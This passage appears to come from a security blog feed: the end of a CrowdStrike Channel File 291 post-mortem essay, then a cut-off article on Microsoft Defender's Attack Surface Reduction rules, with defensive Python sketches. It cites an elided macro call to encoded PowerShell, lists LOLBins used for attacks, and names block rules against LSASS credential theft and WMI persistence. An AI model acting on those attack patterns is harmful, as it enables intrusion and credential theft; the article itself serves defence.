Probably elevated, but no public primary source establishes the specific IRQL value. The article says only that the fault occurred at an interrupt request level high enough that the kernel could not unwind to a structured exception handler in any meaningful way. Microsoft's own July 27, 2024 post-mortem reproduces the WinDBG dump but does not publish the IRQL value at the moment of the fault [@ms-secblog-2024-07-27]. Neither does CrowdStrike's August 6, 2024 Root Cause Analysis [@cs-rca-2024-08-06]. Treat any IRQL-specific claim about Channel File 291 from a third-party source as speculation unless it cites a primary source that publishes the value.

Did a regulator mandate the Windows Resiliency Initiative?

No. The Microsoft response is squarely a U.S.-side platform-stewardship response to a U.S.-litigated incident. European regulatory frameworks were part of the policy backdrop. U.S. federal bodies (the Government Accountability Office, the Congressional Research Service, and a House Homeland Security Subcommittee) shaped the political environment [@gao-24-107733, @crs-if12717-everycrsreport, @homeland-hearing-page, @govinfo-chrg-118hhrg60030]. But the proximate political cause was the operational loss of 8.5 million Windows hosts and the Congressional accountability event that followed; no regulatory body mandated the WRI's specific architectural choices.

How was Channel File 291 different from the 2010 McAfee DAT 5958 incident?

Architecturally it is not different in any structural way. Both were vendor content updates that caused vendor kernel drivers to misbehave at fleet scale. McAfee DAT 5958 was a false positive on `svchost.exe` that triggered the McAfee kernel driver to quarantine the system file, putting Windows XP SP3 fleets into reboot loops [@uscert-mcafee-2010, @sans-isc-8656, @askperf-mcafee]. CrowdStrike Channel File 291 was a parameter-count mismatch that triggered the CrowdStrike kernel driver to dereference an unmapped address, producing `PAGE_FAULT_IN_NONPAGED_AREA` [@cs-rca-2024-08-06]. The differences were the *scale* of the 2024 event (8.5 million Windows hosts versus a far smaller XP fleet in 2010) and the *cost calculus*. By 2024, fourteen years of recurring kernel-driver-bricks-fleet incidents had raised the political cost of doing nothing so high that Microsoft could no longer be credibly attacked for taking action [@three-buddy-ep5].
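A content validator can catch a parameter-count mismatch like the one in the last answer with a single bounds check. The sketch below assumes a hypothetical content format in which each entry lists the indices of the sensor-supplied input fields it matches on. The names and field counts are illustrative, not CrowdStrike's actual template format. In Python the out-of-range read raises `IndexError`. The same read in a kernel driver can touch an invalid address and bug-check the host.

```python
from dataclasses import dataclass
from typing import List, Sequence, Tuple


@dataclass(frozen=True)
class ContentEntry:
    """Hypothetical content record: which input fields this entry inspects."""
    field_indices: Tuple[int, ...]


def validate(entry: ContentEntry, supplied_inputs: int) -> bool:
    """The missing check: every referenced field must exist in the sensor's inputs."""
    return all(0 <= i < supplied_inputs for i in entry.field_indices)


def interpret(entry: ContentEntry, inputs: Sequence[str]) -> List[str]:
    """Toy interpreter: read each referenced input field."""
    return [inputs[i] for i in entry.field_indices]


inputs = [f"field{i}" for i in range(20)]  # the sensor supplies 20 values (illustrative)
good = ContentEntry(field_indices=(0, 5, 19))
bad = ContentEntry(field_indices=(0, 20))  # references a 21st field that was never supplied

print(validate(good, len(inputs)), validate(bad, len(inputs)))  # True False
try:
    interpret(bad, inputs)
except IndexError:
    print("out-of-range read: would have been caught by validate()")
```

The check belongs in the publishing pipeline, before content ships. In the kernel there is no `IndexError` to catch.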

The seventy-eight-minute window of July 19, 2024 collapsed twenty years of political resistance to the Vista-era idea that vendor-authored kernel-mode code is a fleet-scale reliability liability, and accelerated Microsoft's Windows Resiliency Initiative into a multi-year, partner-coordinated migration that puts third-party endpoint security where Apple put it in 2019 [@apple-esf-docs] and where Microsoft itself had been quietly building the platform pieces since at least 2021 [@msft-ebpf-windows, @mslearn-hvci]. The 8.5 million figure from Brad Smith's morning-after blog post [@ms-bradsmith-2024-07-20] is the empirical anchor that supplied the political license; the Toulouse 2006 quote "either everybody has access to the kernel, or nobody does" [@informationweek-2006-toulouse] is the historical anchor that supplied the architectural answer; the Ionescu pivot of April 3, 2025 [@cs-ionescu-ctio-2025-04-03] is the political anchor that demonstrated the answer would not be fought.

Whether user-mode EDR with hypervisor-assisted memory introspection can deliver the coverage equivalence that twenty-five years of kernel-mode hooking has built is the next decade's research problem, and the honest mid-2026 answer is we do not yet know. The macOS seven-year ESF deployment supplies the strongest available yes evidence; the not-yet-stress-tested MVI 3.0 rings supply the strongest available not-yet-discriminated evidence; the BYOVD enforcement gap that no public source quantifies supplies the strongest available honest concern [@cisa-cm0058].

Key idea: July 19, 2024 did not invent the architecture; it provided the political license for an architecture two other operating systems had already validated. The next several years will tell us whether the architecture, transplanted to Windows under the WRI, reaches feature equivalence with the kernel-mode hooking it replaces, or whether the equivalence question is the wrong question and the right question is whether the platform features layered below the user-mode broker close enough of the coverage gap. The honest answer mid-2026 is that the question is genuinely open, and the next public evidence -- the first MVI 3.0 ring stop-gate event, the first Defender-kernel-out GA, the first quantified HVCI enablement statistic -- is the evidence to watch for.

Companion articles in this series cover the substrate pieces in more depth: EDR/Sysmon as the canonical user-mode consumer of kernel ETW telemetry [@mslearn-sysmon]; Vulnerable Driver Block List as Microsoft's BYOVD platform mitigation; Process Mitigation Policies and Defender for Endpoint baselines; and Event Tracing for Windows as the cross-cutting platform observability substrate.

Picture the release engineer at the CrowdStrike Falcon Cloud rollout console at 04:09 UTC on a Friday morning in July 2024, watching the deployment indicator go from staging to production for Channel File 291, with no idea that the seventy-eight-minute window about to open would be the most consequential window in twenty-five years of Windows security architecture. The engineer did everything right; the architecture, on that morning, did exactly what twenty-five years of decisions had configured it to do; and the next two years of Microsoft platform engineering, vendor-side rewrites, and political alignment exist to make sure that the next time something similar happens, it does not look like that.

Attack Surface Reduction Rules: The Quiet Layer That Stopped Office Macros

noreply@paragmali.com (Parag Mali) — Tue, 26 May 2026 00:00:00 GMT

**Attack Surface Reduction (ASR) rules are Microsoft's nineteen-rule, kernel-mediated, free-with-Windows behaviour block list.** Each rule names a single edge in the runtime process / file-system / registry graph -- Office spawning child processes, scripts launching downloaded executables, processes opening LSASS, vulnerable signed drivers being written -- and refuses to let it happen. The rules have shipped since Windows 10 1709 (October 2017) [@ms-security-blog-exploit-guard-2017] and killed the cheap end of the Office-macro initial-access chain at the enterprise tier. Two other events finished the era. The Microsoft 365 Apps default block of internet-marked macros (February and July 2022) [@ms-techcommunity-internet-macros-2022] closed it at the consumer tier, and Europol's Operation LadyBird (January 2021) [@europol-emotet-disrupted-wayback] closed it at the C2 tier. The layer is incomplete by construction -- Cohen-1984 undecidability forbids a complete behaviour catalogue [@cohen-1984-part1] -- but it raises the attacker's cost of bypass so effectively that the SOC routinely does not triage the blocks. Every rule emits a rule-specific Advanced Hunting `ActionType` such as `AsrOfficeChildProcessBlocked`; the folk-knowledge generic `AsrRuleTriggered` does not exist [@ms-learn-asr-reference].

1. One Block, No Analyst Ticket

At 03:42 on a Tuesday morning in Frankfurt, a finance analyst opens an invoice attached to an email that looks like one she has answered fifty times before. The document's Document_Open macro fires, the VBA calls Shell("powershell.exe -enc ..."), and nothing happens. No PowerShell window. No second-stage download. No banking-trojan loader. No ransom note three weeks later. The only artefact is one row in Microsoft Defender for Endpoint's DeviceEvents table, with ActionType equal to AsrOfficeChildProcessBlocked, that no analyst will triage because there is nothing left to triage [@ms-learn-asr-reference].

That row, and the silence around it, is the entire subject of this article.

To understand why nothing happened, watch the call in slow motion. WINWORD.EXE is a long-running user-mode process. The macro's process-creation call crosses the syscall boundary into the kernel's process-management subsystem. Defender's kernel-mode driver WdFilter.sys is registered in two places: with the Windows Filter Manager as a file-system minifilter, and with the kernel's process subsystem via PsSetCreateProcessNotifyRoutineEx. Its process-creation notify routine intercepts the event before the new process runs and hands it to the user-mode antivirus engine MsMpEng.exe. (Section 5 walks the kernel/user-mode split in full.) MsMpEng.exe evaluates the rule with GUID D4F940AB-401B-4EFC-AADC-AD5F3C50688A -- "Block all Office applications from creating child processes" [@ms-learn-asr-reference]. The predicate evaluates true. The rule is set to Block. WdFilter.sys fails the process creation from inside its notify routine. The macro's process-creation call returns an error. The spawn never happens.
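The decision in that walkthrough reduces to a small function of one parent-to-child edge and the rule's configured mode. This is a minimal sketch, not Defender's implementation. Several parts are assumptions: the `evaluate_process_create` name, the GUID-keyed `rule_modes` dictionary, the string mode names, and the three-image Office list (an illustrative subset of the Office applications the real rule covers). Warn mode is deliberately left out. The `ActionType` strings follow the rule-specific Audited/Blocked naming of Microsoft's rules reference.

```python
from dataclasses import dataclass
from typing import Dict, Optional

# GUID of "Block all Office applications from creating child processes".
OFFICE_CHILD_PROCESS_RULE = "D4F940AB-401B-4EFC-AADC-AD5F3C50688A"

# Illustrative subset of the Office parent images the real rule covers.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}


@dataclass(frozen=True)
class Verdict:
    allowed: bool
    action_type: Optional[str]  # DeviceEvents ActionType this outcome would surface as


def evaluate_process_create(parent_image: str, child_image: str,
                            rule_modes: Dict[str, str]) -> Verdict:
    """Toy evaluation of the Office child-process rule on one parent->child edge.

    The rule matches on the parent alone: any child of an Office process is in
    scope, so child_image is accepted only to keep the edge explicit.
    """
    mode = rule_modes.get(OFFICE_CHILD_PROCESS_RULE, "Disabled")
    if parent_image.lower() not in OFFICE_IMAGES or mode == "Disabled":
        return Verdict(allowed=True, action_type=None)
    if mode == "Audit":
        return Verdict(allowed=True, action_type="AsrOfficeChildProcessAudited")
    if mode == "Block":
        return Verdict(allowed=False, action_type="AsrOfficeChildProcessBlocked")
    raise ValueError(f"mode not modelled in this sketch: {mode!r}")  # e.g. Warn


block = {OFFICE_CHILD_PROCESS_RULE: "Block"}
print(evaluate_process_create("WINWORD.EXE", "powershell.exe", block))
print(evaluate_process_create("explorer.exe", "powershell.exe", block))
```

Audit mode returns the same match but lets the process start. That is what makes the audit-then-block rollout in this article safe to run.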

Attack Surface Reduction (ASR) rules are a fixed catalogue of behavioural blocks shipped as a feature of Microsoft Defender Antivirus on Windows 10 1709 and later, Windows 11, and supported Windows Server editions. Each rule names a specific runtime behaviour -- "Office applications creating child processes," "credential stealing from the Windows local security authority subsystem," "abuse of exploited vulnerable signed drivers." Each can be enabled in Audit, Warn, or Block mode through Microsoft Intune, Microsoft Configuration Manager, Group Policy, PowerShell, or the Defender for Endpoint portal. As of May 2026 the catalogue contains nineteen rules: three Standard protection rules and sixteen Other ASR rules [@ms-learn-asr-reference].

Notice what the rule did not do. It did not classify the binary. Both WINWORD.EXE and powershell.exe are signed by Microsoft. Both have multi-decade Authenticode reputation. Both have appeared on every reasonable allow-list since Windows 7. A signature engine, asked "is the macro malicious," would have had to read the macro's bytes, normalise its obfuscation, and decide whether the sequence of Office object-model calls plus a base64 blob constitutes hostile intent. That decision is hard in the easy cases and undecidable in general. The rule sidestepped the whole question. It classified the edge between two perfectly legitimate signed binaries: WINWORD.EXE becoming the parent of powershell.exe. The bytes are not the predicate. The parent-child relationship is.

The folklore that "every ASR block emits ActionType == 'AsrRuleTriggered'" survives in vendor playbooks and Stack Overflow answers but does not match Microsoft Learn's current rules reference, which enumerates a rule-specific Asr<RuleName>Audited and Asr<RuleName>Blocked pair for every rule except the server-only Webshell rule. The canonical Advanced Hunting filter is where ActionType startswith "Asr", not equality against a generic value [@ms-learn-asr-reference].
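The difference between the folklore filter and the canonical one shows up on just a handful of rows. This minimal sketch emulates the two KQL predicates in Python over illustrative `DeviceEvents` rows. The device names are invented, and `AntivirusDetection` is included as a non-ASR row. KQL's `startswith` is case-insensitive, so the emulation lower-cases before comparing.

```python
from typing import Dict, List

Row = Dict[str, str]

rows: List[Row] = [
    {"DeviceName": "fin-ws-01", "ActionType": "AsrOfficeChildProcessBlocked"},
    {"DeviceName": "fin-ws-02", "ActionType": "AsrOfficeChildProcessAudited"},
    {"DeviceName": "fin-ws-03", "ActionType": "AntivirusDetection"},
]


def folklore_filter(rows: List[Row]) -> List[Row]:
    # where ActionType == "AsrRuleTriggered"  -- no such ActionType exists
    return [r for r in rows if r["ActionType"] == "AsrRuleTriggered"]


def canonical_filter(rows: List[Row]) -> List[Row]:
    # where ActionType startswith "Asr"  -- KQL startswith ignores case
    return [r for r in rows if r["ActionType"].lower().startswith("asr")]


print(len(folklore_filter(rows)), len(canonical_filter(rows)))  # 0 2
```

The folklore query returns zero rows because it matches nothing, not because nothing happened. That silent-empty result is why it survives in playbooks unnoticed.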

The Frankfurt analyst's hypothetical Tuesday is one of millions. Defender Antivirus ships on every supported edition of Windows [@ms-learn-asr-reference]. The Office-child-process rule has been blockable since October 2017 [@ms-security-blog-exploit-guard-2017]. It is not the only ASR rule, and ASR is not the only layer that ended the Emotet macro era. Europol's January 27, 2021 takedown and the Microsoft 365 Apps default block of internet macros in February and July 2022 share the credit. But ASR is the layer with the deepest enforcement substrate (a kernel-mode minifilter), the fullest behavioural catalogue (nineteen rules naming specific runtime edges), and the simplest mental model for a defender: name a behaviour, ship an enforcement edge, audit, then block.

Note: Signature engines classify nodes (is this binary malicious?). AppLocker classifies identities (is this binary on the allow-list?). ASR classifies edges in the runtime graph (did this specific parent-child invocation happen?). Section 5 builds the framework. The catalogue in Section 6 reads as nineteen named edges once you see it.
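The three paradigms can be set side by side as three predicates over the same Frankfurt event. This toy sketch rests on loud assumptions: the hash corpus is empty, the allow-list and Office image set are illustrative, and the byte string is a stand-in rather than a real binary. The point is only which question each predicate asks.

```python
import hashlib
from typing import Set

KNOWN_BAD_SHA256: Set[str] = set()  # illustrative signature corpus: neither binary is in it
ALLOW_LIST = {"winword.exe", "powershell.exe"}  # illustrative identity allow-list
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}  # illustrative subset


def node_allows(image_bytes: bytes) -> bool:
    """Signature engine: is this binary's hash on the known-bad list?"""
    return hashlib.sha256(image_bytes).hexdigest() not in KNOWN_BAD_SHA256


def identity_allows(image_name: str) -> bool:
    """AppLocker-style: is this binary on the allow-list?"""
    return image_name.lower() in ALLOW_LIST


def edge_allows(parent: str, child: str) -> bool:
    """ASR-style: is this parent->child edge forbidden? (Any child of Office is.)"""
    return parent.lower() not in OFFICE_PARENTS


parent, child = "WINWORD.EXE", "powershell.exe"
child_bytes = b"stand-in for powershell.exe"
print("node:    ", node_allows(child_bytes))
print("identity:", identity_allows(parent) and identity_allows(child))
print("edge:    ", edge_allows(parent, child))
```

Only the edge predicate refuses the event. The node and identity predicates both pass, because both binaries are legitimately what they claim to be.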

The rest of the article walks the ten questions the Frankfurt block raises. If signatures cannot tell us whether the analyst's macro is malicious -- because both binaries are signed and the static fingerprint of the macro changes every campaign -- how exactly did one row in DeviceEvents know to fire? What does the kernel see that the signature engine does not? Why did three predecessor paradigms (signatures, AppLocker, EMET) fail to close this specific gap, and what made October 2017 the moment Microsoft decided to ship a behaviour catalogue instead of a better classifier? Section 2 starts with the empirical signal that forced the shift.

2. Why Signatures Stopped Being Enough

By the time Microsoft published the October 23, 2017 Windows Defender Exploit Guard launch announcement, the team had a single sentence ready for the executive summary: "fileless attacks, which compose over 50% of all threats" [@ms-security-blog-exploit-guard-2017]. That line did two jobs. It justified shipping ASR. It also marked the moment the signature model hit its industrial-scale ceiling.

Despite advances in antivirus detection capabilities, attackers are continuously adapting ... This emerging trend of fileless attacks, which compose over 50% of all threats, are extremely dangerous, constantly changing, and designed to evade traditional AV. -- Microsoft Threat Intelligence team, October 23, 2017 [@ms-security-blog-exploit-guard-2017]

The 50-percent number is a 2017-vintage Microsoft characterisation, not a peer-reviewed empirical study, but it captures a structural shift that every endpoint-defence vendor had been watching for three years. Three forces had converged.

First, mature crypters and packers had defeated static signatures. The classic AV pipeline -- compute a hash, match against a corpus of known-bad hashes -- assumed attackers shipped a small number of stable binaries. By 2017 the typical commodity malware family rebuilt its payload on every campaign, layered three encryption stages, and emerged as a polymorphic blob whose static fingerprint changed faster than the signature feed. Fred Cohen had warned in 1984 that any complete malicious-program detector reduces to the Halting Problem [@cohen-1984-part1]; commodity packers were the industrial-scale form of that result.
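A toy illustration of why hash matching loses to repacking, assuming a single XOR "crypter" in place of the multi-stage packers described above: the payload logic never changes, but every new key produces new bytes and therefore a new SHA-256. The function names are hypothetical.

```python
import hashlib
import os

def pack(payload: bytes, key: bytes) -> bytes:
    """Toy crypter: XOR every byte with a repeating per-campaign key (XOR is its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))

def signature(blob: bytes) -> str:
    """Static fingerprint of the on-disk bytes, as a hash-matching engine would compute it."""
    return hashlib.sha256(blob).hexdigest()

payload = b"identical stage-two logic shipped in every campaign"

# The defender's corpus holds the hash of last campaign's build.
known_bad = {signature(pack(payload, b"campaign-1"))}

# The operator rebuilds under a fresh random key; the logic is unchanged.
key = os.urandom(16)
next_build = pack(payload, key)

print(signature(next_build) in known_bad)  # False: the new hash is not in the corpus
print(pack(next_build, key) == payload)    # True: unpacking recovers the same logic
```

The corpus only ever matches bytes it has already seen; the stage-two logic the operator cares about survives every rebuild untouched.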

Second, attackers had moved off custom binaries entirely. The Living-Off-the-Land Binaries, Scripts, and Libraries project -- LOLBAS -- catalogues over two hundred Microsoft-signed Windows binaries that attackers use to execute malicious behaviour without dropping any malware artefact on disk [@lolbas-project]. powershell.exe, cmd.exe, wscript.exe, mshta.exe, regsvr32.exe, rundll32.exe, cmstp.exe, msdt.exe, msbuild.exe, installutil.exe -- all signed by Microsoft, all on every reasonable allow-list, all capable of executing arbitrary code given the right command line. The on-disk artefact is benign; the malice lives in the runtime edge between two signed binaries.

LOLBin (living-off-the-land binary): A signed Microsoft Windows binary that attackers use to execute malicious behaviour while staying off identity-based allow-lists. The LOLBAS Project enumerates over two hundred such binaries together with the abuse classes each enables and the MITRE ATT&CK techniques each maps to [@lolbas-project].

Third, Office macros had become the dominant initial-access vector. Emotet first appeared as a banking trojan in June 2014; by 2017 it had transformed into a crime-as-a-service loader platform that delivered TrickBot, Dridex, IcedID, and eventually Conti and Ryuk to its access buyers [@welivesecurity-emotet-pivot-2022]. The delivery vehicle barely changed across that pivot: a Word or Excel document, a Visual Basic for Applications macro, a call into Shell, WScript.Shell.Run, or the Windows Management Instrumentation provider to spawn the next stage. The malice was never inside WINWORD.EXE. The malice was in the edge that connected WINWORD.EXE to whichever signed Microsoft binary the operator decided to spawn.

Mark of the Web (MOTW): The NTFS alternate data stream `Zone.Identifier` written by browsers, mail clients, and archive extractors to flag a file as originating from outside the local machine. Office uses the MOTW to drop a downloaded document into Protected View; the February 2022 Microsoft 365 Apps internet-macro default block treats the MOTW as the trigger to remove the "Enable Content" button entirely [@ms-learn-internet-macros-blocked].

The pre-2017 defence stack covered slices of this problem, but no layer covered the specific behaviour class "an Office application creates a child process." AV signatures and heuristics scored the binaries; both were signed Microsoft binaries. AppLocker (2009) decided whether a binary was allowed to run; both were on the allow-list. EMET (2009) blocked memory-corruption exploit primitives; the macro chain involved no memory corruption. Reputation-based file blocking covered downloaded payloads; the payload was a base64 string passed on the PowerShell command line, never written to disk. Each layer answered a different question. None answered the question the macro chain raised.

The strategic shift Microsoft eventually made was small in the framing and enormous in the consequences. Instead of asking "is this binary malicious?" -- a question undecidable in general -- the next layer would ask "did the suspicious behaviour happen?" The new question is decidable per event at the OS interception layer, because the kernel sees every process-creation call, every image load, every file write, every registry set. Edge classification does not require static analysis; it requires only that the kernel be wired to ask one extra predicate before completing the operation.

The named author at the bottom of the 2017 launch post body (fetched 2026-05-26) is Misha Kutsovsky (@mkutsovsky), Program Manager, Windows Active Defense. The top-of-page byline and <meta name="author"> tag have since been consolidated under the "Microsoft Threat Intelligence" institutional account during Microsoft's 2022-2025 re-platforming of older Security Blog posts; the in-body attribution is unchanged. This article cites the institutional author as it appears in the page head; the named person at the bottom of the body is Kutsovsky [@ms-security-blog-exploit-guard-2017].

One taxonomy point deserves its own paragraph, because confusion about it shapes most beginner questions about ASR. Microsoft Defender Antivirus is the on-host scanning engine that ships free with every Windows edition. Microsoft Defender for Endpoint (MDE) is the cloud-managed EDR layer Microsoft sells on top. ASR rules live inside Defender Antivirus. They run whether or not the device is enrolled in MDE. MDE adds management, telemetry ingestion through the DeviceEvents table, and Advanced Hunting; it does not add the enforcement. The Frankfurt block fires in Defender Antivirus; the DeviceEvents row only reaches MDE if MDE is connected. The EDR-in-block-mode page is explicit on the dependency: ASR rules run only when Defender Antivirus is in Active mode, never when a third-party AV is primary and Defender is passive [@ms-learn-edr-in-block-mode].

By 2014-2015 the Microsoft Defender team had identified the problem. They did not invent the answer from scratch. They inherited a Windows defence stack that had been trying to solve the same problem for sixteen years, in three earlier paradigms. What were they, and why did none of them stop Emotet?

3. AppLocker, EMET, and What They Could Not Do

Three predecessor paradigms. Three different failures. Three different lessons that Microsoft eventually folded into the design of ASR.

AppLocker (2009, Windows 7)

AppLocker was the identity-based answer to the question "which binaries are allowed to run on this endpoint?" Administrators write rules that allow or deny executable code by publisher, by path, or by file hash; the kernel enforces the policy at process-creation time. Microsoft Learn still describes AppLocker as the Windows 7-era predecessor to App Control for Business, and the design has not changed structurally in the intervening sixteen years [@ms-learn-applocker]. AppLocker is genuinely stricter than ASR on the identity axis. A well-tuned AppLocker policy on a hardened endpoint enforces default-deny: only allowed publishers, only allowed paths, only allowed hashes ever execute.

AppLocker has two practical weaknesses and one structural one. The first practical weakness is brittleness against signed LOLBins: powershell.exe, cmd.exe, wscript.exe, mshta.exe, regsvr32.exe, rundll32.exe, cmstp.exe, msdt.exe, msbuild.exe, installutil.exe are all on every reasonable AppLocker allow-list because every legitimate IT-automation pipeline depends on them [@lolbas-project]. The second is admin-deployment overhead: every new line-of-business application needs an explicit rule addition, large estates fall back to Audit mode permanently, and exception sprawl turns the policy into a sieve.

The structural weakness is the one that matters here. The AppLocker rule grammar has no slot for "WINWORD.EXE may run, but it may not be the parent of cmd.exe." That sentence is a property of an edge in the runtime graph, and the AppLocker schema models nodes, not edges.

EMET (2009-2018)

The Enhanced Mitigation Experience Toolkit was Microsoft's per-process opt-in exploit-time mitigation framework. Data Execution Prevention, Address Space Layout Randomization, Structured Exception Handler Overwrite Protection, the Export Address Table Access Filter, anti-Return-Oriented-Programming heuristics, caller-checks, heap-spray pre-allocation -- EMET stitched the menu together for any process the administrator opted in. EMET stopped buffer overflows from achieving code execution. It made the cheap exploit-development pipeline visibly more expensive.

EMET did not stop the Emotet macro chain. The chain involved no memory corruption. The chain was a legitimately loaded, uncorrupted, signed Office application making a perfectly ordinary user-mode parent-child process-creation call. There was no exploit primitive to mitigate. The 2017 Exploit Guard launch announcement said the same in cleaner language: Exploit Protection (the Windows-integrated pillar that absorbed EMET's mitigations) and Attack Surface Reduction (the new pillar) cover different gaps, because exploit-time mitigations and post-exploit behaviour blocks address different attacker stages [@ms-security-blog-exploit-guard-2017]. EMET reached end-of-life on July 31, 2018 per the Microsoft product lifecycle page [@ms-lifecycle-emet]; its mitigations live on under different names in the Exploit Protection panel of Windows Security.

Signature and heuristic AV

The third predecessor is the one Cohen's 1984 paper had already analysed. Signature and heuristic AV classify nodes, which is to say they answer "is this binary, considered as a sequence of bytes, malicious?" Cohen proved that the general form of that question reduces to the Halting Problem [@cohen-1984-part1].

Cohen's undecidability result: The classical result, established in Fred Cohen's 1984 paper "Computer Viruses: Theory and Experiments" (presented at the 7th DoD/NBS Computer Security Conference and reprinted in Computers and Security 6(1):22-35 in January 1987), that detection of arbitrary viral behaviour in a program reduces to the Halting Problem. The diagonal construction assumes a decider `D(P)` for viral behaviour, constructs a program `V` that calls `D(V)` and behaves virally iff `D(V) = 0`, and derives a contradiction. The more general statement, that any non-trivial semantic property of programs is undecidable, is Rice's 1953 theorem, of which Cohen's result is an instance [@cohen-1984-part1].
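The diagonal construction can be run as a toy. This sketch assumes a drastically simplified model, not Cohen's formalism: a "program" is a zero-argument Python function whose boolean return value stands for "behaves virally", and a decider is any deterministic function from programs to booleans. The helper names are hypothetical.

```python
from typing import Callable

Program = Callable[[], bool]       # returns True iff the program "behaves virally" (toy assumption)
Decider = Callable[[Program], bool]

def diagonal(decide: Decider) -> Program:
    """Build V from a claimed decider D: V behaves virally iff D(V) says it does not."""
    def v() -> bool:
        return not decide(v)
    return v

def decider_is_wrong_on_v(decide: Decider) -> bool:
    v = diagonal(decide)
    return decide(v) != v()

# Every total, deterministic candidate misclassifies the V built against it.
candidates = {
    "always_viral": lambda p: True,
    "never_viral": lambda p: False,
    "name_heuristic": lambda p: "virus" in p.__name__,
}
for name, decide in candidates.items():
    print(name, decider_is_wrong_on_v(decide))  # True for every candidate
```

A decider that simply ran its input would recurse forever on V, which is the Halting Problem showing through.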

The practical version of the ceiling for the Emotet case is that a signature engine cannot, in general, distinguish a Word macro that legitimately spawns cmd.exe to run an IT-automation script from a Word macro that spawns cmd.exe to launch the Emotet stage-two PowerShell stub. Both call the same Win32 API. Both pass argument strings the engine cannot prove are malicious without modelling the operator's intent. The fingerprint of the malice is not in the binaries; it is in the runtime relationship between them.

The three paradigms -- signature, identity, edge -- are not redundant. Modern defence-in-depth runs all three because each closes a different attacker option. Signatures detect known-bad binaries cheaply; identity controls restrict which binaries may run at all; edge classification refuses specific behavioural relationships among allowed binaries. AppLocker without ASR lets `WINWORD.EXE` spawn PowerShell. ASR without AppLocker permits any unsigned binary to ship with the next campaign. Neither alone covers the gap. Section 7 makes the layering explicit as a comparison matrix.

The three together demonstrate that the Windows endpoint defence stack of 2017 was structurally node-classifying or identity-classifying, with no layer modelling the runtime edge. The strategic gap is the slot ASR was designed to fill.

On October 17, 2017, Microsoft shipped Windows 10 Fall Creators Update (build 1709) [@windows-blog-fall-creators-update-2017]. Six days later, the Microsoft Security Blog named the new pillar: Attack Surface Reduction [@ms-security-blog-exploit-guard-2017]. What did the first eight rules do, and how did they finally model the edge that AppLocker, EMET, and signatures could not?

4. The Evolution, Generation by Generation

October 23, 2017. The Microsoft Security Blog publishes "Windows Defender Exploit Guard: Reduce the attack surface against next-generation malware" [@ms-security-blog-exploit-guard-2017]. The post names four pillars: Attack Surface Reduction, Network Protection, Controlled Folder Access, and Exploit Protection. The first pillar ships with eight rules. Nine years later the catalogue is nineteen rules wide. Each generation closed a specific attacker behaviour; each generation produced a published bypass within months.

flowchart TD G1["Gen 1 - Oct 2017 (1709) - 8 Office, script, email rules"] G2["Gen 2 - 2018-2019 (1803-1903) - LSASS, PSExec/WMI, prevalence, Adobe, WMI persistence"] G3["Gen 3 - Apr 2020 - Warn mode added, platform 4.18.2008.9"] G4a["Gen 4a - Dec 2021 / 2022 - BYOVD rule, Vulnerable Driver Reporting Center"] G4b["Gen 4b - Feb/Jul 2022 - Parallel layer, M365 Apps internet-macro default block"] G5["Gen 5 - 2023-2026 - Standard protection partition, Webshell, Safe Mode reboot, copied tools, USB, Outlook child-process rules"] G1 --> G2 --> G3 --> G4a --> G4b --> G5

Generation 1, October 2017 -- the eight launch rules

The launch rules, as listed verbatim in the 2017 announcement, are the Office-macro response pack [@ms-security-blog-exploit-guard-2017]:

Block Office applications from creating executable content
Block Office applications from launching child processes
Block Office applications from injecting into other processes
Block Win32 imports from macro code in Office
Block obfuscated macro code (and other obfuscated scripts, AMSI-backed)
Block JavaScript or VBScript from launching downloaded executable content
Block execution of executable content dropped from email or webmail
Block malicious JavaScript and VBScript scripts (AMSI-backed)

None of these rules solves a node-classification problem. Each rule names a single edge in the runtime process / file-system / registry graph and refuses to let it happen. "Block Office applications from launching child processes" does not ask "is WINWORD.EXE malicious?" but "did WINWORD.EXE just try to be the parent of another process?" Once the kernel has intercepted the process-creation edge, answering that question takes one comparison against the parent image path.
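A minimal sketch of that predicate, assuming the intercepted edge arrives as a pair of image paths. The class, field names, and three-entry parent set are hypothetical, and the real rule's coverage list is not reproduced here; the point is that the decision reads only the parent's identity.

```python
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Hypothetical subset of Office parent images.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

@dataclass(frozen=True)
class ProcessCreateEdge:
    parent_image: str  # full path of the process calling CreateProcess
    child_image: str   # full path of the process it is trying to create

def office_child_process_edge(edge: ProcessCreateEdge) -> bool:
    """True when the edge's parent is an Office app. The child is never inspected:
    cmd.exe, powershell.exe, or an unknown binary all match."""
    return PureWindowsPath(edge.parent_image).name.lower() in OFFICE_PARENTS

word = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
cmd = r"C:\Windows\System32\cmd.exe"
print(office_child_process_edge(ProcessCreateEdge(word, cmd)))                       # True
print(office_child_process_edge(ProcessCreateEdge(r"C:\Windows\explorer.exe", cmd)))  # False
```

No byte of either binary is analysed; the verdict is a set-membership test on the parent's file name.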

Generation 2, 2018-2019 -- credential theft, lateral movement, persistence

Between Windows 10 1803 (April 2018) and 1903 (May 2019) the catalogue expanded beyond Office to the rest of the attacker intrusion chain. Six new rules with their GUIDs, from the Microsoft Learn rules reference [@ms-learn-asr-reference]:

Block credential stealing from the Windows local security authority subsystem -- 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -- introduced 1803. The Mimikatz response: refuse process handles to lsass.exe with rights sufficient to read its address space.
Block executable files from running unless they meet a prevalence, age, or trusted list criterion -- 01443614-cd74-433a-b99e-2ecdc07bfc25 -- 1803. The unique-binary-per-campaign response, leaning on cloud-protection (MAPS) reputation.
Block process creations originating from PSExec and WMI commands -- d1e49aac-8f56-4280-b9ba-993a6d77406c -- 1803. The Emotet lateral-movement response.
Use advanced protection against ransomware -- c1db55ab-c21a-4637-bb3f-a12568109d35 -- 1803. The mass-encryption-detection response, also cloud-protection-dependent.
Block Adobe Reader from creating child processes -- 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c -- 1809. The PDF-exploit-spawning-payload response.
Block persistence through WMI event subscription -- e6db77e5-3df2-4cf1-b95a-636979351e5b -- 1903. The APT29 / Cobalt Strike __FilterToConsumerBinding response.
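The LSASS rule's edge is a handle request, not a process creation. A hypothetical, simplified predicate, assuming the interception layer sees the target image and the requested access mask: the two constants are the real `winnt.h` values, but the decision logic is an illustration, not the rule's published behaviour.

```python
from pathlib import PureWindowsPath

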